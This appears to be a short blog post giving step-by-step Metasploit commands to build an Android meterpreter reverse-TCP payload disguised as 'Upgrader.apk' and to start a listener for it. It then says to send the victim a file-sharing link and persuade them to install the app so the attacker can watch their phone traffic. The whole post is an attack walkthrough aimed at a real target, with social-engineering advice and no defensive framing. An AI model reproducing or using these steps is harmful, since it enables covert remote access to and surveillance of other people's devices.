Header Ads

Header ADS

Exploiting a Mobile Device Remotely

 

Exploiting a Mobile Device Remotely 

Kali Linux, a known toolkit for exploiting computers, is also one of the most efficient tools to perform a hack on a mobile device. Follow these steps to perform a remote hack on a mobile device and install a malicious file on a targeted device.

    1. Pull up Kali Linux  

Type the following command: 

msfpayload android/meterpreter/reverse_tcp LHOST=[your device’s IP address] R > /root/Upgrader.apk

   2. Pull up a new terminal  

While Kali is creating your file, load another terminal and load the metasploit console. To do that, enter the command:

Msfconsole

   3. Set up the listener

Once metasploit is up, load the multi-handler exploit by entering the command:

use exploit/multi/handler  

Afterward, create the reverse payload by typing the following command:  

set payload android/meterpreter/reverse_tcp  

Next, you will need to set up the L host type in order for you to start receiving traffic. To do that, type the following command:

set LHOST [Your device’s IP address]  

    4. Start the exploit  

Now that you have your listener ready, you can now start your exploit by activating your listener. To do this, type the command:  

Exploit

If the malicious file or Trojan that you have created a while ago is ready, copy it from the root folder to your mobile device, preferably an android phone. Afterwards, make that file available by uploading it on any file-sharing site such as speedyshare or Dropbox. Send the link to your target, and ask him to install the app. 

O n c e y o u r t a r g e t u s e r h a s in s t alle d t h e file , y o u c a n n o w r e c eiv e t h e t r a f fic t h a t h e is r e c eivin g t h r o u g h his m o bile d e vic e! 

No comments

Powered by Blogger.